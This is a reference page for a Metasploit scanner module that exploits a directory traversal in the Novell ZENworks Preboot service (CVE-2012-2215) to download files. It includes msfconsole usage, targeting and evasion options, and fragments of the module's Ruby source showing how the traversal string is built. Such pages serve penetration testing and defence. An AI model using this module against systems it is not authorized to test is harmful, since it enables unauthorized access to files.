Novell ZENworks Configuration Management Preboot Service Remote File Access - Metasploit


This page contains detailed information about how to use the auxiliary/scanner/misc/zenworks_preboot_fileaccess metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Novell ZENworks Configuration Management Preboot Service Remote File Access
Module: auxiliary/scanner/misc/zenworks_preboot_fileaccess
Source code: modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb
Disclosure date: -
Last modification time: 2022-01-23 15:28:32 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 998
List of CVEs: CVE-2012-2215

This module exploits a directory traversal in the ZENworks Configuration Management. The vulnerability exists in the Preboot service and can be triggered by sending a specially crafted PROXY_CMD_FTP_FILE (opcode 0x21) packet to the 998/TCP port. This module has been successfully tested on Novell ZENworks Configuration Management 10 SP2 and SP3 over Windows.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


This module is a scanner module, and is capable of testing against multiple hosts.

msf > use auxiliary/scanner/misc/zenworks_preboot_fileaccess
msf auxiliary(zenworks_preboot_fileaccess) > show options
    ... show and set options ...
msf auxiliary(zenworks_preboot_fileaccess) > set RHOSTS ip-range
msf auxiliary(zenworks_preboot_fileaccess) > exploit

Other examples of setting the RHOSTS option:

Example 1:

msf auxiliary(zenworks_preboot_fileaccess) > set RHOSTS 192.168.1.3-192.168.1.200 

Example 2:

msf auxiliary(zenworks_preboot_fileaccess) > set RHOSTS 192.168.1.1/24

Example 3:

msf auxiliary(zenworks_preboot_fileaccess) > set RHOSTS file:/tmp/ip_list.txt

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the scanner/misc/zenworks_preboot_fileaccess auxiliary module looks in the msfconsole:

msf6 > use auxiliary/scanner/misc/zenworks_preboot_fileaccess

msf6 auxiliary(scanner/misc/zenworks_preboot_fileaccess) > show info

       Name: Novell ZENworks Configuration Management Preboot Service Remote File Access
     Module: auxiliary/scanner/misc/zenworks_preboot_fileaccess
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Luigi Auriemma
  juan vazquez <[email protected]>

Check supported:
  No

Basic options:
  Name      Current Setting                      Required  Description
  ----      ---------------                      --------  -----------
  DEPTH     6                                    yes       Traversal depth
  FILEPATH  \WINDOWS\system32\drivers\etc\hosts  yes       The name of the file to download
  RHOSTS                                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT     998                                  yes       The target port (TCP)
  THREADS   1                                    yes       The number of concurrent threads (max one per host)

Description:
  This module exploits a directory traversal in the ZENworks 
  Configuration Management. The vulnerability exists in the Preboot 
  service and can be triggered by sending a specially crafted 
  PROXY_CMD_FTP_FILE (opcode 0x21) packet to the 998/TCP port. This 
  module has been successfully tested on Novell ZENworks Configuration 
  Management 10 SP2 and SP3 over Windows.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2012-2215
  OSVDB (80230)
  http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=975

Module Options


This is a complete list of options available in the scanner/misc/zenworks_preboot_fileaccess auxiliary module:

msf6 auxiliary(scanner/misc/zenworks_preboot_fileaccess) > show options

Module options (auxiliary/scanner/misc/zenworks_preboot_fileaccess):

   Name      Current Setting                      Required  Description
   ----      ---------------                      --------  -----------
   DEPTH     6                                    yes       Traversal depth
   FILEPATH  \WINDOWS\system32\drivers\etc\hosts  yes       The name of the file to download
   RHOSTS                                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     998                                  yes       The target port (TCP)
   THREADS   1                                    yes       The number of concurrent threads (max one per host)

Advanced Options


Here is a complete list of advanced options supported by the scanner/misc/zenworks_preboot_fileaccess auxiliary module:

msf6 auxiliary(scanner/misc/zenworks_preboot_fileaccess) > show advanced

Module advanced options (auxiliary/scanner/misc/zenworks_preboot_fileaccess):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   CHOST                                 no        The local client address
   CPORT                                 no        The local client port
   ConnectTimeout       10               yes       Maximum number of seconds to establish a TCP connection
   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL                  false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                             no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode        PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion           Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   ShowProgress         true             yes       Display progress messages during a scan
   ShowProgressPercent  10               yes       The interval in percent that progress should be shown
   VERBOSE              false            no        Enable detailed status messages
   WORKSPACE                             no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the scanner/misc/zenworks_preboot_fileaccess module can do:

msf6 auxiliary(scanner/misc/zenworks_preboot_fileaccess) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the scanner/misc/zenworks_preboot_fileaccess auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(scanner/misc/zenworks_preboot_fileaccess) > show evasion

Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Please supply the name of the file you want to download


Here is a relevant code snippet related to the "Please supply the name of the file you want to download" error message:

40:	  end
41:	
42:	  def run_host(ip)
43:	    # No point to continue if no filename is specified
44:	    if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?
45:	      print_error("Please supply the name of the file you want to download")
46:	      return
47:	    end
48:	
49:	    travs = "\\.." * datastore['DEPTH']
50:	    travs << "\\" unless datastore['FILEPATH'][0] == "\\"

Unable to get length due to a timeout


Here is a relevant code snippet related to the "Unable to get length due to a timeout" error message:

59:	    sock.put(packet)
60:	    sock.get_once(4, 1)
61:	    length = sock.get_once(4, 1)
62:	
63:	    unless length
64:	      print_error("Unable to get length due to a timeout")
65:	      return
66:	    end
67:	
68:	    sock.get_once(0x210-8, 1)
69:	    contents = sock.get_once(length.unpack("V").first, 1)

Unable to extract contents due to a timeout


Here is a relevant code snippet related to the "Unable to extract contents due to a timeout" error message:

67:	
68:	    sock.get_once(0x210-8, 1)
69:	    contents = sock.get_once(length.unpack("V").first, 1)
70:	
71:	    unless contents
72:	      print_error("Unable to extract contents due to a timeout")
73:	      return
74:	    end
75:	
76:	    disconnect
77:	

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Luigi Auriemma
  • juan vazquez

Version


This page has been produced using Metasploit Framework version 6.2.7-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.